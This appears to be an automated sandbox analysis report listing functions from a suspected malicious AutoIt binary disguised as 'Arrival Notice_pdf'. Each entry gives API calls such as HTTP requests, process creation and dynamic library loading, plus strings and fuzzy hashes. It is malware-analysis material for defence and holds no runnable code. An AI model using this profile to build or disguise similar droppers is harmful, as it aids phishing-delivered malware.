Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 23cc9c4e19c037e3c45216f6613eef8912794d0f0ba5d3e8def4cccf133a0d97
Instruction ID: e8ac69ae0213dcb1dcaa916d7f2347c48f37d1aa129dfb5f075a0bd7966ffbb8
Opcode Fuzzy Hash: 23cc9c4e19c037e3c45216f6613eef8912794d0f0ba5d3e8def4cccf133a0d97
Instruction Fuzzy Hash: D9918B30A283019FCB14DF24D58595BBBE4EF89704F14486EF89A8B362DB31ED55CB52

Function 00285347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025C6F4: _wcscpy.LIBCMT ref: 0025C717

_memset.LIBCMT ref: 00285438
GetMenuItemInfoW.USER32(?), ref: 00285467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00285513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0028553D

Strings

0, xrefs: 00285430

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: de090ddf068bd036f3c254f0ef3eea65e20f1a70be72181c985b2b1eb8cf7384
Instruction ID: 1dcf0d9e4a469bd05954698efa3502a828ffe84cf07195902f06229c8a588b63
Opcode Fuzzy Hash: de090ddf068bd036f3c254f0ef3eea65e20f1a70be72181c985b2b1eb8cf7384
Instruction Fuzzy Hash: 4F5134791367229BD315BF28C8406ABBBE8EF85350F44062EF895D31D0D7B4CD648B52

Function 00280213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0028027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002802B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002802C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00280344

Strings

DllGetClassObject, xrefs: 002802B7

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: ee340183885494fde5420b49dadbcb4e77015029b3809eb43544ff460363b09e
Instruction ID: b02a701da9e0498f15be6b9c81923bbfcb3bf9251f0ed4ac1ec4e3064f4f3ec3
Opcode Fuzzy Hash: ee340183885494fde5420b49dadbcb4e77015029b3809eb43544ff460363b09e
Instruction Fuzzy Hash: 92419B75621204EFDB45EF54C8C5BAA7BB9EF44300B1480ADA9099F286D7F0DE58CBA0

Function 00285007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00285075
GetMenuItemInfoW.USER32 ref: 00285091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 002850D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00301708,00000000), ref: 00285120

Strings

0, xrefs: 0028506D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 967282e79b8cb9b23c3d59e15d5daca61331004d917c220c50ef74504f1a04cc
Instruction ID: c402c1d0a239baff01f4f512c898c32a10a5bfb9da0eddefd923dd573806c8b0
Opcode Fuzzy Hash: 967282e79b8cb9b23c3d59e15d5daca61331004d917c220c50ef74504f1a04cc
Instruction Fuzzy Hash: B541E3782167129FD720EF24D888F2ABBE9AF89314F14461EF859972D1D730E814CF62

Function 002A0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 002A0587

Strings

none, xrefs: 002A0662
winapi, xrefs: 002A05F8
stdcall, xrefs: 002A0609
cdecl, xrefs: 002A05DE

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 741bd3b53aa8fea06ba1a379f502ea97d8a9ba053a8c57b33ef01526da012847
Instruction ID: 6292eb8b8f43ca6d747ec1324076fbfed37bbd19f917445c5fdd5ea90418aaf5
Opcode Fuzzy Hash: 741bd3b53aa8fea06ba1a379f502ea97d8a9ba053a8c57b33ef01526da012847
Instruction Fuzzy Hash: 7931923092021AAFCF04EF54C9819EEF3B8FF55714B10462AE866A76D1DB71E925CF90

Function 0027B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0027B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0027B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0027B8D1

Strings

ComboBox, xrefs: 0027B815
ListBox, xrefs: 0027B84D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: a2b3823582db4ced294820d67a7af6057f3ae16227f62d1bdab4d467936bbdaf
Instruction ID: 66297c7d740eff27cac62f70fe9e3afdba1b5114ec2796b9e40b44545932fe8b
Opcode Fuzzy Hash: a2b3823582db4ced294820d67a7af6057f3ae16227f62d1bdab4d467936bbdaf
Instruction Fuzzy Hash: 14210771920108BFDB099F64D88AEFE777CDF06350F208129F565A32E0DB744D2A9B60

Function 002943E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00294401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00294427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00294457
InternetCloseHandle.WININET(00000000), ref: 0029449E

Part of subcall function 00295052: GetLastError.KERNEL32(?,?,002943CC,00000000,00000000,00000001), ref: 00295067

Strings

, xrefs: 00294450

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 482dbeb033bef48c5a983d35198faea32247672918d4b843b2bdc5d7217770f9
Instruction ID: 5e0ae94ccb9dccb1b1288b40bb908fa9f566bbadf521ac5306e44080d00e8fde
Opcode Fuzzy Hash: 482dbeb033bef48c5a983d35198faea32247672918d4b843b2bdc5d7217770f9
Instruction Fuzzy Hash: 0D2192B5610208BFEB11AF54DC85EBFB6FCFB48B44F10902AF109A2140EA749D169B71

Function 002A90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0025D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025D1BA
Part of subcall function 0025D17C: GetStockObject.GDI32(00000011), ref: 0025D1CE
Part of subcall function 0025D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002A915C
LoadLibraryW.KERNEL32(?), ref: 002A9163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002A9178
DestroyWindow.USER32(?), ref: 002A9180

Strings

SysAnimate32, xrefs: 002A9137

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 39d01e0146f0a092cc6b0bc0f93a5663de0dc5d692a997c74105f90c3ad7d971
Instruction ID: 8735c5b01f6ecfc4721954a0ffa43ceea0862a88de4ae01cbb85f5f2562cd20a
Opcode Fuzzy Hash: 39d01e0146f0a092cc6b0bc0f93a5663de0dc5d692a997c74105f90c3ad7d971
Instruction Fuzzy Hash: 7B219271620207BBEF104F65DC88FBB37ADEF56364F104619F95896190CB71DCA1AB60

Function 00289568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00289588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002895B9
GetStdHandle.KERNEL32(0000000C), ref: 002895CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00289605

Strings

nul, xrefs: 00289600

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 75a3d4822c1a370b5651dcd263c08f732c26b09c87196ef435adbb12bb3e3a89
Instruction ID: b033a8547150ebc9c39e9468d7982fe7cc798a419dd685b6f6c4b41314f2544a
Opcode Fuzzy Hash: 75a3d4822c1a370b5651dcd263c08f732c26b09c87196ef435adbb12bb3e3a89
Instruction Fuzzy Hash: 4521B5785112069FDB11AF25EC04EAE77F8AF44320F644A29FC61D72D0D774D9A0CB10

Function 00289634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00289653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00289683
GetStdHandle.KERNEL32(000000F6), ref: 00289694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002896CE

Strings

nul, xrefs: 002896C9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: d43efee1768b93175249a39aa08cf6696226434ddb00440edfc7f1f05c87d812
Instruction ID: 5bd325228d53152f4aa9bc70e8287850c9ea18366ec6fb980d28e7fdc641d6ce
Opcode Fuzzy Hash: d43efee1768b93175249a39aa08cf6696226434ddb00440edfc7f1f05c87d812
Instruction Fuzzy Hash: 3621B8755212169FDB10AF699C04EA977ECAF45730F240A18FCA1D32D1F770D8A1CB10

Function 0028DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0028DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0028DB5E
__swprintf.LIBCMT ref: 0028DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,002DDC00), ref: 0028DBB5

Strings

%lu, xrefs: 0028DB71

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 3dd851eb59afe41cee447d1beac100128abdc314c5947e97b594261de82abddc
Instruction ID: 29b9dba8d66e67952010dbb2ed575d9cc58849b289c4c6dff6d3fb92146d6e89
Opcode Fuzzy Hash: 3dd851eb59afe41cee447d1beac100128abdc314c5947e97b594261de82abddc
Instruction Fuzzy Hash: 0C21C535A10108AFDB10EF64DD85DAEBBB8EF49704B104069F509D7291DB70EE51CF60

Function 0027C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0027C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0027C84A
Part of subcall function 0027C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0027C85D
Part of subcall function 0027C82D: GetCurrentThreadId.KERNEL32 ref: 0027C864
Part of subcall function 0027C82D: AttachThreadInput.USER32(00000000), ref: 0027C86B

GetFocus.USER32 ref: 0027CA05

Part of subcall function 0027C876: GetParent.USER32(?), ref: 0027C884

GetClassNameW.USER32(?,?,00000100), ref: 0027CA4E
EnumChildWindows.USER32(?,0027CAC4), ref: 0027CA76
__swprintf.LIBCMT ref: 0027CA90

Strings

%s%d, xrefs: 0027CA8A

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: e5487e91026b65b2eac77b024463329971048e11fa73f59edf063a2bd9a7d5a3
Instruction ID: c5f9047fa799b465c5e05f2eea44b0c8bec135270381f958fa2df32acadb7f60
Opcode Fuzzy Hash: e5487e91026b65b2eac77b024463329971048e11fa73f59edf063a2bd9a7d5a3
Instruction Fuzzy Hash: 071172715202096BCB11BFA09C89FAA376CAF45714F10807AFE0CAA186DB709966DF71

Function 00267A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00267AD8

Part of subcall function 00267CF4: __mtinitlocknum.LIBCMT ref: 00267D06
Part of subcall function 00267CF4: EnterCriticalSection.KERNEL32(00000000,?,00267ADD,0000000D), ref: 00267D1F

InterlockedIncrement.KERNEL32(?), ref: 00267AE5
__lock.LIBCMT ref: 00267AF9
___addlocaleref.LIBCMT ref: 00267B17

Strings

`,, xrefs: 00267AA3

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `,
API String ID: 1687444384-2092815365
Opcode ID: 4122be4c8a699fb9f22dd3ef4839ecdddd3382456a4b91001385debec3ac54ed
Instruction ID: e43e0930cf8746ad2ed708613b0fc98900f15c84b77e4601118cdb88fea3931c
Opcode Fuzzy Hash: 4122be4c8a699fb9f22dd3ef4839ecdddd3382456a4b91001385debec3ac54ed
Instruction Fuzzy Hash: D7016DB1414B00DFD720DF75E90974AB7F0EF54329F20890EA49A976A0CB74A690CF45

Function 002AE32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002AE33D
_memset.LIBCMT ref: 002AE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00303D00,00303D44), ref: 002AE37B
CloseHandle.KERNEL32 ref: 002AE38D

Strings

D=0, xrefs: 002AE346

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=0
API String ID: 3277943733-3303244828
Opcode ID: 307b66a43b03e721f3a7f393098d5607ec1cfeaa55dac8280a0670acff994a39
Instruction ID: b5d3a783ae57b0781d1f0a0fd18bc7324151d89dff3fdb7fd08aab589fefcf36
Opcode Fuzzy Hash: 307b66a43b03e721f3a7f393098d5607ec1cfeaa55dac8280a0670acff994a39
Instruction Fuzzy Hash: 2FF0E2F0511300BFE3021B61AC69FBB7E5CDB04754F004022FE08D61A2D3719E108BA8

Function 002A1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002A19F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 002A1A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002A1B49
CloseHandle.KERNEL32(?), ref: 002A1BBF

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: c38ba657fc2165c186f40e36830e002962d005bb2c24d1bbf930694ddab08e48
Instruction ID: c8012a3308510bd1c1a979f92ee38c11fe7f6ac35d641b14bd7d1fbdcdccc153
Opcode Fuzzy Hash: c38ba657fc2165c186f40e36830e002962d005bb2c24d1bbf930694ddab08e48
Instruction Fuzzy Hash: 6D81A370610201ABDF109F64C886BAEBBE5AF09721F148459FD05AF3C2DBB4E965CF94

Function 00281C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00281CB4
VariantClear.OLEAUT32(00000013), ref: 00281D26
VariantClear.OLEAUT32(00000000), ref: 00281D81
VariantClear.OLEAUT32(?), ref: 00281DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00281E26

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 39b4b0bd3b4657950feff3f8c6c482f3e3e1cf37de32e8f6caaebe16b69186bf
Instruction ID: d0c41e82e0ff7dfa7c18f6e336996fcb3d0ba395500ecf9f9feb29a01d5b52b4
Opcode Fuzzy Hash: 39b4b0bd3b4657950feff3f8c6c482f3e3e1cf37de32e8f6caaebe16b69186bf
Instruction Fuzzy Hash: 5E516CB9A10209AFDB14DF58C884EAAB7B8FF4C314B158559ED49DB341D330E921CBA0

Function 002A0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002A06EE
GetProcAddress.KERNEL32(00000000,?), ref: 002A077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 002A079B
GetProcAddress.KERNEL32(00000000,?), ref: 002A07E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 002A07FB

Part of subcall function 0025E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0028A574,?,?,00000000,00000008), ref: 0025E675
Part of subcall function 0025E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0028A574,?,?,00000000,00000008), ref: 0025E699

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 0e1afaac67cbae0efdc0c760f5715ee91ae97bcdd7399439c2259432fe6a1589
Instruction ID: f5ee09fef12c99ef03a0c73ed3962bad3037cd54ce0c019ee3f4b675e6cb6b6d
Opcode Fuzzy Hash: 0e1afaac67cbae0efdc0c760f5715ee91ae97bcdd7399439c2259432fe6a1589
